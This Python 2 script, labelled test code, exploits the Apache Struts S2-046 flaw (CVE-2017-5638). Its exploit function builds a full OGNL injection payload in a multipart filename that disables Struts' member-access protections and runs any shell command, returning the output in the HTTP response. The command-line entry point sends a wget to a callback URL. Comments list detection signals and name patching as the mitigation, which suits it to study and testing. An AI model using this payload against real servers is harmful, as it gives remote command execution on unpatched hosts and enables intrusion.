#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
    """Send one multipart POST whose upload filename carries an OGNL expression.

    This is test code for Struts S2-046 (CVE-2017-5638). The expression is
    placed in the ``filename`` parameter of the part's Content-Disposition
    header, and the response body is returned so the caller can see whether
    the target evaluated it.

    Request traits visible in this function that defenders can match on:
      * a Content-Disposition ``filename`` value starting with ``%{``;
      * the strings ``ognl.OgnlContext``, ``_memberAccess``,
        ``getExcludedPackageNames``/``getExcludedClasses`` and
        ``java.lang.ProcessBuilder`` inside a multipart body;
      * a declared Content-Length far larger than the body actually sent.
    Mitigation is to run a Struts release that contains the S2-046 fix.

    Args:
        url: Address the POST is sent to.
        cmd: Command string embedded verbatim in the expression.

    Returns:
        The response body, or the partial body when the read ends early.
        The same value is also printed.

    Raises:
        Only httplib.IncompleteRead is caught here; any other error raised
        by urllib2.urlopen propagates to the caller.
    """
    # Expression prologue: obtain the default member-access object and, when
    # #_memberAccess is not directly assignable, empty OgnlUtil's excluded
    # package/class lists and install the default member access on the context.
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    # NOTE(review): cmd is interpolated as-is, with no escaping or validation;
    # the caller is responsible for keeping it a fixed, benign value.
    payload += "(#cmd='%s')." % cmd
    # The command is wrapped for cmd.exe or /bin/bash depending on os.name,
    # run through ProcessBuilder with stderr merged into stdout.
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    # Process output is copied into the servlet response stream, which is why
    # the HTTP response body read below contains the command output.
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    # Single-part multipart body; the expression sits in the filename
    # parameter and the file content itself is a short dummy string.
    body = "------WebKitFormBoundaryXd004BVJN9pBYBL2\r\n"
    body += "Content-Disposition: form-data; name=\"upload\"; filename=\"%s\"\r\n" %payload
    body += "Content-Type: text/plain\r\n\r\n"
    body += "miau\r\n"
    body += "------WebKitFormBoundaryXd004BVJN9pBYBL2--\r\n"
    try:
        # The declared Content-Length (1000000000) is far larger than the body
        # built above; that mismatch is itself a detection signal.
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Length': '1000000000','Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2'}
        request = urllib2.Request(url,body,headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        # A truncated response is expected often enough to be handled: keep
        # whatever bytes arrived instead of failing.
        page = e.partial
    print(page)
    return page
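if __name__ == '__main__':
    # Command-line entry point: expects the target URL and a callback URL.
    # The command sent is fixed to a single wget of the callback URL, so a
    # request arriving at logurl is the only evidence of evaluation.
    import re
    import sys

    if len(sys.argv) != 3:
        print("[*] s2-046_cve2017-5638.py <url> <logurl>")
    else:
        # Banner previously read CVE2017-5368; the identifier used in the
        # usage line above (CVE-2017-5638) is the correct one.
        print("\x20\x20+-------------------------------------------------+")
        print("\x20\x20| S2-046_CVE2017-5638 TestCode |")
        print("\x20\x20| Rebujacker |")
        print("\x20\x20+-------------------------------------------------+")
        url = sys.argv[1]
        logurl = sys.argv[2]
        # logurl ends up inside a shell command line on the tested host.
        # Enforce the author's "don't inject more commands" rule in code:
        # accept only a plain http(s) URL made of a conservative character
        # set (no whitespace, quotes or shell metacharacters).
        if not re.match(r'https?://[A-Za-z0-9._~:/?=-]+\Z', logurl):
            print("[!] logurl must be a plain http(s) URL")
            sys.exit(1)
        # Please don't change cmd or inject more commands.
        cmd = "wget %s" % logurl
        exploit(url, cmd)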